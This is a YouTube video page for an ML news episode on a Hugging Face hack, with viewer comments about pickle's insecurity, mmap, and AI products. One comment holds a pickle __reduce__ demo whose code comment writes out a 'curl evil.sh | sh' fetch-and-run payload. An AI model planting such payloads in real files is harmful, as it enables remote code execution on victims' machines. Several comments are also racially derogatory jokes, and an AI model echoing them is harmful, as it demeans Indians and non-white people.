Hugging Face got hacked
- Published May 21, 2024
- Links:
Homepage: ykilcher.com
Merch: ykilcher.com/merch
YouTube: / yannickilcher
Twitter: / ykilcher
Discord: ykilcher.com/discord
LinkedIn: / ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: www.subscribestar.com/yannick...
Patreon: / yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n
Category: Science & Technology
Amazon believes AI stands for "Actually, Indians".
😂
I envision 7,000 Indian managers worldwide working for Amazon who oversee all the robots etc. in the warehouses.
It's the new Domino's.
To be fair, if an AI is controlling an Indian, it is still AI at work.
Attentive Indians.
Artificial Indians
0:00 intro
0:09 Hugging Face Hacked
3:33 GPT-4 bar exam
5:10 Amazon's Grocery Stores
6:44 delve
7:28 Devin's competition
11:12 lightning-thunder
11:45 gpt-author
13:26 Maestro
14:16 Tactics2D
14:50 LLaMA on CPUs
16:05 Microsoft Course
16:45 GGUF parser
17:40 farewell
Hi Yannic, if you copy this to the description, it will create timestamps. Format requirements: time first, and it must start from 0:00.
The optimisation stuff is crazy. I remember not long after LLaMA came out, I think it was Justine who pointed out that AI researchers using Python were loading these massive tensor files and then processing them, essentially doubling the memory use. And for 15 GB files that was crazy. Thankfully, operating system engineers had already solved this problem years ago: mmap. You memory-map a large file and the OS kernel does all the hard work of making it seem like it's all loaded into sequential RAM, including loading pages when needed and swapping them in and out when RAM is under pressure.
I wonder how much CPU and RAM were wasted.
Again, it's almost like we never learn. Lol.
Hm, memory mapping works when you only need part of the file at any moment. To produce an output, an LLM needs all of the weights, and computation happens far faster than loading from storage, so for this to be efficient most of the time the CPU would be waiting for data.
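The mmap trick described in this thread can be sketched with just the standard library. This is a toy demo (file name, sizes, and layout are invented): it maps a "weights" file and reads a single float32 at an arbitrary offset without ever copying the whole file into a Python buffer — the kernel pages data in on demand.

```python
import mmap
import os
import struct
import tempfile

# Create a sample "weights" file: 1,000,000 float32 values (~4 MB),
# written as 1000 rows of 1000 identical floats.
path = os.path.join(tempfile.gettempdir(), "demo_weights.bin")
with open(path, "wb") as f:
    for i in range(1000):
        f.write(struct.pack("<1000f", *([float(i)] * 1000)))

# Memory-map the file read-only: no upfront copy into process memory.
with open(path, "rb") as f:
    mm = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)
    # Read element 500_500 (row 500) directly via its byte offset.
    offset = 4 * 500_500
    (value,) = struct.unpack_from("<f", mm, offset)
    mm.close()

os.remove(path)
print(value)  # the float stored in row 500, i.e. 500.0
```

Real loaders like llama.cpp do essentially this on the actual weight file, so the page cache is shared across processes and nothing is loaded twice.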
It's crazy that HF didn't see a problem with executing arbitrary code from strangers on their servers.
Crazier that it took this long to be noticed.
I see AI-generated content working well in a "choose your own adventure" kind of way. The actual writer or writers could build the world and characters, along with some high-level generalizations of what goes on, and the reader can work their way through it.
I started to write out how I'd implement it but I realized it would take too long, lots of potential.
Love it! Thanks for sharing all.
What happened to the reference links? They were very useful! - one of the (many) reasons I love your channel!
The irony that automatic software engineer projects would be looking for humans to contribute...
only the beginning of our future sub-API lifestyles 😅
Well, you have to help them help themselves and you until they can do better. It's like having a student who will become better than you at some point.
@@impolitevegan3179 It is not, because all they can do is copy existing material, poorly. The theoretical reason is that transformers have the computing capability of a regular expression (an FSA); hoping that genius will somehow appear if only you can stuff more data into it is like hoping an elephant will become a giraffe if you pull on its neck long enough.
@@impolitevegan3179 That current systems will become better software engineers than any human is something I'll believe when I see it, and literally not a second earlier.
@@clray123 That's the most misleading statement I've ever heard about transformers. _Any_ object that exists in the real world has a finite number of states and you can therefore theoretically model its behaviour with a finite-state machine. That doesn't keep us from calling humans or most normal computers Turing-complete and it shouldn't keep you from realising that LLMs can parse and generate type-0 languages.
Also, "copying" is an inadequate description of what transformers do. Of course anything they do, they base on their training data. So does your brain though.
So it's funny how you two have completely opposite points of view on generative AI, and I think you're both wrong ;) Why is it so hard for people to talk and think about generative AI without either being of the opinion that it's basically AGI with a few kinks to be ironed out, or that it's complete trash and less useful than a calculator? Y'all _gotta_ see that the truth is somewhere in between, right?
5:10 I recalibrated my internal models: exams like those are really useless for anything besides telling how good you are at remembering stupid crap for exams.
Damn, three news videos in a week.
It was a nice delve into ML news with you.
Thank you Justine
Hey Yannic, thank you for the video, awesome as always! PS do you usually have a list with links?
In Poland there is Żabka, which is just-walk-out and works perfectly, using only computer vision.
Devin was a fraud.
Humans across domains typically become more efficient through many, many iterations, unless mathematical tools are used.
AI, while not exactly new, doesn't really have mathematical models for doing things efficiently yet.
So of course we are going to do it very inefficiently.
It's similar to how security is almost entirely nonexistent unless there is some tool that tells you you are doing it wrong.
These things happen because the education and environment that teach humans are not optimized very well, so you end up with very common holes in human understanding.
Where there are holes in the foundation, you commonly see holes in the humans learning on top of that foundation.
Thanks Yannic
The links are missing :(
Excellent delve!
Sick burn on stock shrinkage, lol. Same in NY, I heard.
Is your intro music an excerpt from a real song? It sounds badass
So I updated my biases now 😂
Pickle is almost as bad as the days when JavaScript used to save JSON by actually saving JavaScript, and on load you loaded and ran that JavaScript.
It's almost like we never learn.
It depends on the use case. If you have some Python script that generates and consumes its own data, then pickle is a fine solution. The problem is that these things get used way beyond what they were intended for.
That's why huggingface wrote safetensors...
It was just not invented for the purpose for which it was abused. It's not like the authors of Pickle did it by accident and then realized "oops, it can execute code", but the dumb Python-illiterate users who ignore the documentation are certainly an issue here.
@@neelsg It really doesn't depend on the use case. It's a disastrously stupid idea that is almost guaranteed to get you completely and easily pwned once the attacker gets an initial foothold in your system. I mean, you don't have just one line of defence here.
@@winsomehax I thought pickle was supposed to be used when running code one is writing oneself, in an explorative way, and one needs to restart Python or reboot one's computer.
Like, "unless you made the pickle file yourself, you shouldn't unpack it"?
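To make the danger this thread is debating concrete, here is a minimal sketch (class name invented, and a harmless call substituted for the payload) of why unpickling an untrusted file is arbitrary code execution. `__reduce__` lets any object tell pickle which callable to invoke at load time; an attacker ships `os.system`, while this demo uses the harmless `os.getcwd` to show the mechanism. Avoiding this is exactly why safetensors stores raw tensors plus a JSON header instead of executable bytecode.

```python
import os
import pickle


class EvilCheckpoint:
    """Looks like a saved model, but __reduce__ injects a call at load time."""

    def __reduce__(self):
        # An attacker would return (os.system, ("curl evil.sh | sh",)).
        return (os.getcwd, ())


payload = pickle.dumps(EvilCheckpoint())

# Merely *loading* the file runs the attacker's callable. The result is
# whatever that call returned, not an EvilCheckpoint instance at all.
result = pickle.loads(payload)
print(type(result))  # a str (the cwd), proving getcwd already ran
```

Note that no method on the loaded object is ever called by the victim; deserialization alone triggers the code, which is why "just don't use the object" is not a defence.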
One word that I've been seeing over and over again lately is "moreover". It's a word I don't remember ever seeing with any regularity in the past, but I see it constantly now. Nearly every day I'll see it used in an article I'm reading on the internet, and I'll stop and realize I'm probably consuming AI-generated content. It's pretty creepy, honestly.
7:10, PoE gamers, rise up!
I like the fun news. Especially the Amazon shop with human annotators for each purchase! 💡
The GPT-4 that took the bar exam was the 32k version. I work with the guy who wrote the paper lol
huggingface at its best
OMG! They just hit 1 million models saved, what news!
This is millions of times better than any AI video I’ve seen to date. No hype train, just facts
6:29 😂
I heard in California every store is a just walk out store
Buy me sunglasses.
Please put links in the description 😢
2:23 The fashionable cynical chuckle
6:40 haha what a jab at california
Hacking Face
7:06 I only know delve as the debugger for go
2018 lol
Computer hallucinates in a bar?
Fix the Hugging Face bug demo in Devin?
I think Sayak Paul's Twitter account has also been hacked, is that true? And why does Hugging Face do nothing about this?
Very good but no good at all.
Wasn't devin demo fake?
devinitely
🤗 is not hacked
AI written fiction is very boring.
Tldr?
news
San Francisco has adopted the "just walk out" policy for anyone non-white who'd rather not have to pay money for goods. Apparently many businesses have also adopted the slogan in regards to San Francisco itself.
"Hugging Face got hacked" noooo wtf people, very disappointing